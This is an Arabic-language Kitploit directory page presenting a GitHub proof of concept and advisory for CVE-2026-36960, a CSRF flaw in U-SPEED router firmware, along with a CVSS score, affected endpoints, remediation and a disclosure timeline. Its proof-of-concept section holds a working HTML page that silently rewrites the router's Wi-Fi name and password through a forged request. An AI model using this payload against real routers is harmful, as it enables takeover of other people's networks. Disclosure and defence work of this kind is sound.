Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-36960 — إثبات مفهوم لاستغلال CVE-2026-36960، وهي ثغرة تزوير طلبات عبر المواقع (CSRF) في البرنامج الثابت لموجّه U-SPEED تسمح بتغييرات غير مصرح بها في الإعدادات عبر طلبات مزورة. | Kitploit
أدوات/GitHubGitHub/kirubel-cve/cve-2026-36960
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

إثبات مفهوم لاستغلال CVE-2026-36960، وهي ثغرة تزوير طلبات عبر المواقع (CSRF) في البرنامج الثابت لموجّه U-SPEED تسمح بتغييرات غير مصرح بها في الإعدادات عبر طلبات مزورة.

عرض المستودع
4منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-36960: تزوير الطلبات عبر المواقع (CSRF) في واجهة الإدارة عبر الويب

معرف CVE: CVE-2026-36960 التاريخ: 2026-04-29 مكتشف الثغرة: Kirubel Solomne البائع: U-SPEED المنتج: راوتر U-SPEED إصدار البرنامج الثابت: V1.0.0 CWE: CWE-352 - تزوير الطلبات عبر المواقع (CSRF)


الوصف

لا يطبّق البرنامج الثابت V1.0.0 لراوتر U-SPEED آليات حماية من CSRF مثل رموز مكافحة CSRF أو التحقق الصارم من رؤوس Origin/Referer لنقاط نهاية الإدارة (API). يمكن للمهاجم إنشاء صفحة ويب خبيثة ترسل طلبات HTTP مزورة إلى نقاط نهاية التكوين. إذا قام مسؤول مصادق بزيارة الصفحة الخبيثة، يعالج الراوتر الطلب كإجراء إداري شرعي.


درجة CVSS

درجة CVSS v3.1: 8.8 (عالية) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

المقياسالقيمة
ناقل الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدممطلوب
تأثير السريةعالٍ
تأثير السلامةعالٍ
تأثير التوافرعالٍ

نقاط النهاية المتأثرة

نقطة النهايةالوظيفة
/api/setWlanإعدادات الشبكة اللاسلكية
/api/telnetإعدادات خدمة Telnet
نقاط نهاية تكوين أخرىوظائف إدارية متنوعة

إثبات المفهوم

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

السلوك المتوقع: يجب رفض الطلب بسبب عدم وجود رمز CSRF. السلوك الفعلي: يقبل الراوتر الطلب المزور ويعالجه.


التأثير

  • تعديل غير مصرح به لإعدادات الراوتر
  • الاستيلاء على شبكة WiFi
  • التلاعب بخدمة Telnet
  • حرمان الخدمة عن المستخدمين الشرعيين

المعالجة

  • تنفيذ رموز مكافحة CSRF على جميع نقاط النهاية التي تغيّر الحالة
  • فرض تحقق صارم من رؤوس Origin وReferer
  • استخدام سمة SameSite=Strict لملفات تعريف الارتباط

الجدول الزمني للإفصاح

التاريخالحدث
2026-04-29اكتشاف الثغرة
2026-04-29الإبلاغ إلى MITRE
2026-04-29تعيين CVE-2026-36960
2026-04-29الإفصاح العام

المراجع

  • MITRE CVE-2026-36960
  • CWE-352
  • موقع البائع
تنزيل الأداة